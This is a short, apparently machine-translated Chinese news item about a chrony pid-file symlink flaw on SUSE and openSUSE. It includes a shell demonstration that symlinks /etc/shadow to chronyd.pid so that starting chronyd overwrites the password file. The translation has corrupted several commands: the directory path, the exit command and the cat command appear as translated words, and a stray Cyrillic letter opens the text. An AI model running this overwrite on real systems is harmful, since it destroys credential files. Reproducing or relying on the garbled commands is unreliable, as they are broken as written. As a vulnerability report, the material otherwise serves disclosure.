В
該漏洞是由於 pid 檔案的不安全創建引起的,該檔案是在 chrony 尚未重置其權限並以 root 身份運行時創建的。 在本例中,寫入 pid 檔案的目錄 /run/chrony 是透過 systemd-tmpfiles 或在與使用者和群組「chrony」關聯啟動 chronyd 時使用權限 0750 建立的。 因此,如果您有權訪問使用者 chrony,則可以使用符號連結替換 pid 檔案 /run/chrony/chronyd.pid。 符號連結可以指向 chronyd 啟動時將被覆蓋的任何系統檔案。
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ cd /運行/chrony
chrony$ ln -s /etc/shadow chronyd.pid
慢性$退出
根# /usr/sbin/chronyd -n
^C
# 將保存 chronyd 進程 ID,而不是 /etc/shadow 的內容
根#貓/etc/shadow
15287
脆弱性
SUSE 和 openSUSE 問題
來源: opennet.ru